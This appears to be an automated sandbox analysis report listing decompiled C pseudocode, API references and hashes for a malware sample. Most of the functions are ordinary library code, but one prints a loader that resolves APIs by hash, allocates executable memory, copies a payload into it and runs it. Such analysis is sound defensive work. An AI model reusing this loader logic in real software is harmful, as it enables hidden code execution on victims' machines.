                  • Instruction Fuzzy Hash: 36D0C970510101BFCA315B448E499563666BB25304FA5447BE14BB80A2CA3B8CA3AB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004044B6, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004044B6(void* __ecx, int _a4, int _a8, long _a12) {
				long _t6;

				_t6 = DefFrameProcA( *(__ecx + 0x20),  *(__ecx + 0xe8), _a4, _a8, _a12); // executed
				return _t6;
			}




                  0x004044cd
                  0x004044d4

                  APIs
                  • DefFrameProcA.USER32(?,?,?,?,?), ref: 004044CD
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FrameProc
                  • String ID:
                  • API String ID: 3341528880-0
                  • Opcode ID: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction ID: 761935b3b5861f7f41f0d66eba6b8c0e881f5c6a5c97450171930e68cced642d
                  • Opcode Fuzzy Hash: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction Fuzzy Hash: 81D0EA77000148FBCF025F82DC08D9A7F2AFB99365F558569FA1D090328B339572EB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404644, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404644(void* __ecx, int _a4, int _a8, long _a12) {
				long _t5;

				_t5 = DefMDIChildProcA( *(__ecx + 0x20), _a4, _a8, _a12); // executed
				return _t5;
			}




                  0x00404655
                  0x0040465c

                  APIs
                  • DefMDIChildProcA.USER32(?,?,?,?), ref: 00404655
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ChildProc
                  • String ID:
                  • API String ID: 2769581038-0
                  • Opcode ID: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction ID: 77bd7395ef173343b399dfab2321bc704dceaae62940af897972e085eed1b4c0
                  • Opcode Fuzzy Hash: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction Fuzzy Hash: 32C00237000148FB8F025F82DC04C9A7F2AFBA9361B558015FA180943187339531EB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00435EE6, Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00435EE6() {
				void* _t1;

				_t1 = E00435E74(0); // executed
				return _t1;
			}




                  0x00435ee8
                  0x00435eee

                  APIs
                  • __encode_pointer.LIBCMT ref: 00435EE8
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E86
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000006,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E9D
                    • Part of subcall function 00435E74: RtlEncodePointer.NTDLL(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435EDB
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: 17cc3f827ce23fb23929f520a180e9886f633758a1a1239f613e605e914001a9
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004037C0, Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E004037C0(intOrPtr __edx, void* __eflags) {
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				short _v56;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t18;
				intOrPtr* _t20;
				intOrPtr* _t22;
				intOrPtr* _t24;
				void* _t26;
				long _t27;
				void* _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t46;
				intOrPtr _t51;
				void* _t55;
				void* _t56;
				void* _t59;
				long _t60;
				void* _t63;
				void* _t73;
				void* _t76;
				void* _t80;

				_t80 = __eflags;
				_t51 = __edx;
				E00403340(E00403130(0x4674a0, 0x44f0f5), _t80, 0xa);
				E00402F80(_t14);
				_t18 = E00403690(E004035A0(_t51, 0), 0x3e006b7a);
				_t20 = E00403690(E004035A0(_t51, 0), 0x92ffa82f);
				_t22 = E00403690(E004035A0(_t51, 0), 0xc319fa22);
				_t24 = E00403690(E004035A0(_t51, 0), 0x49b3b7c3);
				_t59 =  *_t18(0, 0x29a, 0xa);
				_t26 =  *_t20(0, _t59);
				_t27 =  *_t22(0, _t59);
				_t60 = _t27;
				_t46 =  *_t24(_t26);
				_t30 = E00402EF0( &_v64, 0x2b0, 0);
				_t73 = _t63 + 0x44;
				if( *((intOrPtr*)(_t30 + 0x18)) < 8) {
					_t31 = _t30 + 4;
					__eflags = _t31;
				} else {
					_t31 =  *((intOrPtr*)(_t30 + 4));
				}
				_push(_t31);
				_t32 = E00430D56();
				_t34 = E00403690(E004035A0(_t51, 0), _t32);
				_t76 = _t73 + 0x10;
				_t55 = _t34;
				_t82 = _v36 - 8;
				if(_v36 >= 8) {
					E00404490(_t46, _t55, _t60, _t82, _v56);
					_t76 = _t76 + 4;
				}
				_v36 = 7;
				_v40 = 0;
				_v56 = 0;
				_t35 = VirtualAlloc(0, _t60, 0x1000, 0x40); // executed
				_t56 = _t35;
				E004311E0(_t46, _t56, _t60, _t56, _t46, _t60);
				_t38 = E00402EF0( &_v60, 0x18d, 0);
				if( *((intOrPtr*)(_t38 + 0x18)) < 8) {
					_t39 = _t38 + 4;
					__eflags = _t38 + 4;
				} else {
					_t39 =  *((intOrPtr*)(_t38 + 4));
				}
				E00403700(_t39, _t56, _t60);
				_t84 = _v36 - 8;
				if(_v36 >= 8) {
					E00404490(_t46, _t56, _t60, _t84, _v56);
				}
				 *_t56();
				return 0;
			}


































                  0x004037c0
                  0x004037c0
                  0x004037df
                  0x004037e6
                  0x004037fb
                  0x00403815
                  0x0040382f
                  0x00403849
                  0x0040385e
                  0x00403863
                  0x0040386a
                  0x0040386d
                  0x00403873
                  0x0040387f
                  0x00403889
                  0x0040388f
                  0x00403896
                  0x00403896
                  0x00403891
                  0x00403891
                  0x00403891
                  0x00403899
                  0x0040389a
                  0x004038ae
                  0x004038b3
                  0x004038b6
                  0x004038b8
                  0x004038bc
                  0x004038c3
                  0x004038c8
                  0x004038c8
                  0x004038d6
                  0x004038de
                  0x004038e6
                  0x004038eb
                  0x004038ee
                  0x004038f2
                  0x00403903
                  0x0040390e
                  0x00403915
                  0x00403915
                  0x00403910
                  0x00403910
                  0x00403910
                  0x0040391b
                  0x00403923
                  0x00403927
                  0x0040392e
                  0x00403933
                  0x00403936
                  0x00403941

                  APIs
                    • Part of subcall function 004035A0: __wcslwr.LIBCMT ref: 0040362D
                    • Part of subcall function 00402EF0: LoadStringW.USER32(?,00000000,?,00000000), ref: 00402F0C
                  • VirtualAlloc.KERNELBASE ref: 004038EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocLoadStringVirtual__wcslwr
                  • String ID:
                  • API String ID: 3774548895-0
                  • Opcode ID: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
                  • Instruction ID: 7289857ab61adf7b4a353bb28ab849fa169669fa0404094dea338f5cccf6774d
                  • Opcode Fuzzy Hash: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
                  • Instruction Fuzzy Hash: FF3151E2E4430076E5107A726C4BF1B299C9B9576EF05043AF905BB2D2F9BDDA0442AB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00440CFD, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00440CFD(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E0043C0B5(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0043C0B5(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                  0x00440d05
                  0x00440d09
                  0x00440d0d
                  0x00440d10
                  0x00440d15
                  0x00440d1c
                  0x00440d22
                  0x00440d34
                  0x00440d49
                  0x00440d5e
                  0x00440d73
                  0x00440d8b
                  0x00440da0
                  0x00440db2
                  0x00440dc7
                  0x00440ddf
                  0x00440df4
                  0x00440e09
                  0x00440e1e
                  0x00440e36
                  0x00440e4b
                  0x00440e60
                  0x00440e75
                  0x00440e8d
                  0x00440ea2
                  0x00440eb7
                  0x00440ecc
                  0x00440ee4
                  0x00440ef9
                  0x00440f0e
                  0x00440f23
                  0x00440f3b
                  0x00440f50
                  0x00440f65
                  0x00440f7a
                  0x00440f92
                  0x00440fa7
                  0x00440fbc
                  0x00440fd1
                  0x00440fec
                  0x00441004
                  0x0044101c
                  0x00441034
                  0x0044104f
                  0x00441067
                  0x0044107f
                  0x00441097
                  0x004410b2
                  0x004410ca
                  0x004410e5
                  0x004410f8
                  0x00441102
                  0x0044110f
                  0x00441117
                  0x00440d17
                  0x00440d1b
                  0x00440d1b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction ID: 59fd04f248aebe5f6f2e84f9c40bf99b053675ffa63a6a04f46dc497c744b53e
                  • Opcode Fuzzy Hash: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction Fuzzy Hash: 95E1D0B290024DFEEF12DAE1CD81DFF77BDEB08748F04055BB255E2041EA75AA059B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042EEC9, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323windowkeyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0042EEC9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E00431A9B(E0044CA27, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E0041F396(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E0040EE3C(_t163, _t165);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								 *(_t204 - 0x14) = E0040F142(_t200);
								__eflags = _t164;
								if(__eflags == 0) {
									L19:
									_t116 = E00404461(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									 *(_t204 - 4) = 0;
									__eflags = _t116;
									if(__eflags != 0) {
										_t164 = E0042EBE0(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E00431160(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E00431160(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x2c;
										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										__eflags =  *(_t192 + 0x44) - _t109;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x2c;
													if( *_t131 >= 0x2c) {
														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
													}
												}
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												__eflags =  *(_t192 + 0x48);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E00404461(__eflags, 0x30);
													E00431160(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E004316F6(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											 *(_t204 - 0x84) = _t139;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = E004117D8( *(_t204 - 0x10));
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E00410293(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E00431B73(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E0040EE3C(_t163, _t165);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = E0040D89A(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}

























                  0x0042eec9
                  0x0042eec9
                  0x0042eed0
                  0x0042eed5
                  0x0042eed7
                  0x0042eeda
                  0x0042eedd
                  0x0042eee0
                  0x0042eee9
                  0x0042ef1c
                  0x0042f20b
                  0x0042f20b
                  0x00000000
                  0x0042ef2f
                  0x0042ef31
                  0x0042ef33
                  0x0042ef36
                  0x00000000
                  0x0042ef3c
                  0x0042ef3c
                  0x0042ef41
                  0x0042ef43
                  0x0042ef45
                  0x0042ef5d
                  0x0042ef5d
                  0x0042ef64
                  0x00000000
                  0x00000000
                  0x0042ef4a
                  0x0042ef51
                  0x00000000
                  0x0042ef53
                  0x0042ef5c
                  0x00000000
                  0x0042ef5c
                  0x0042ef51
                  0x0042ef68
                  0x0042ef7e
                  0x0042ef88
                  0x0042ef8b
                  0x0042ef8d
                  0x0042efb4
                  0x0042efb6
                  0x0042efbc
                  0x0042efbf
                  0x0042efc1
                  0x0042efc4
                  0x0042efc6
                  0x0042efcf
                  0x0042efcf
                  0x0042efd3
                  0x0042efde
                  0x0042efe4
                  0x0042efe6
                  0x0042f002
                  0x0042f008
                  0x0042f00b
                  0x0042f00e
                  0x0042f019
                  0x0042f01e
                  0x0042f02a
                  0x0042f034
                  0x0042f037
                  0x0042f045
